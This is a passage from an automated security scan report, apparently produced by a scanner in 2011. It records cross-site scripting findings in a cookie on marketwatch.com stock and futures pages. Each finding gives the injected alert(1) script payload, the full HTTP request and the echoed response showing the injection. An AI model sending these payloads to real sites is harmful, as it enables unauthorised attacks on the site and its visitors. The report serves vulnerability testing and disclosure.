<script src="http://ad.doubleclick.net/adj/marketwatch.com/investing_stocks_quotesoverview;sym=CLM11;u=%5e%5eb35b3"><script>alert(1)</script>a009d9e91f8;sz=336x280,300x250;tile=6;ord=1820011674?" type="text/javascript">
...[SNIP]...

2.141. http://www.marketwatch.com/investing/future/clm11 [rsi_csl cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/future/clm11

Issue detail

The value of the rsi_csl cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 724ee'%3balert(1)//9db3d425630 was submitted in the rsi_csl cookie. This input was echoed as 724ee';alert(1)//9db3d425630 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /investing/future/clm11?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=724ee'%3balert(1)//9db3d425630; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: recentquotes=Future-us-CLM11; expires=Tue, 09-Aug-2011 16:24:54 GMT; path=/
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp03
Date: Mon, 09 May 2011 16:24:54 GMT
Content-Length: 82540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<scr' + 'ipt language="JavaScript" src="http://ad.doubleclick.net/adj/brokerbuttons.marketwatch.com/quotes;tile=1;pos=1;sym=CLM11;u=^^724ee';alert(1)//9db3d425630;sz=170x40;ord=467494875;">
...[SNIP]...

2.142. http://www.marketwatch.com/investing/stock/clm11 [rsi_csl cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/stock/clm11

Issue detail

The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad919"><script>alert(1)</script>cc35712fa4d was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /investing/stock/clm11?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=ad919"><script>alert(1)</script>cc35712fa4d; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: recentquotes=Future-us-CLM11; expires=Tue, 09-Aug-2011 16:23:31 GMT; path=/
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Mon, 09 May 2011 16:23:30 GMT
Content-Length: 82772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/investing_stocks_quotesoverview;sym=CLM11;u=%5e%5ead919"><script>alert(1)</script>cc35712fa4d;sz=336x280,300x250;tile=6;ord=1978751583?" type="text/javascript">
...[SNIP]...

2.143. http://www.marketwatch.com/investing/stock/clm11 [rsi_csl cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/investing/stock/clm11

Issue detail

The value of the rsi_csl cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d6b0'%3balert(1)//6c93f33aff was submitted in the rsi_csl cookie. This input was echoed as 3d6b0';alert(1)//6c93f33aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /investing/stock/clm11?link=MW_widget_latestnews_247wallst.com HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304378229|session#1304378168481-861858#1304380029|PC#1304378168481-861858.17#1305587772; s_vnum=1306970188698%26vn%3D1; rsi_csl=3d6b0'%3balert(1)//6c93f33aff; rsi_segs=; _chartbeat2=0m4dc0z4voxoe7wg

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: recentquotes=Future-us-CLM11; expires=Tue, 09-Aug-2011 16:23:34 GMT; path=/
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Tue, 10-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Mon, 09 May 2011 16:23:34 GMT
Content-Length: 82498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<scr' + 'ipt language="JavaScript" src="http://ad.doubleclick.net/adj/brokerbuttons.marketwatch.com/quotes;tile=1;pos=1;sym=CLM11;u=^^3d6b0';alert(1)//6c93f33aff;sz=170x40;ord=291731915;">
...[SNIP]...

Report generated by XSS.CX at Mon May 09 11:33:15 CDT 2011.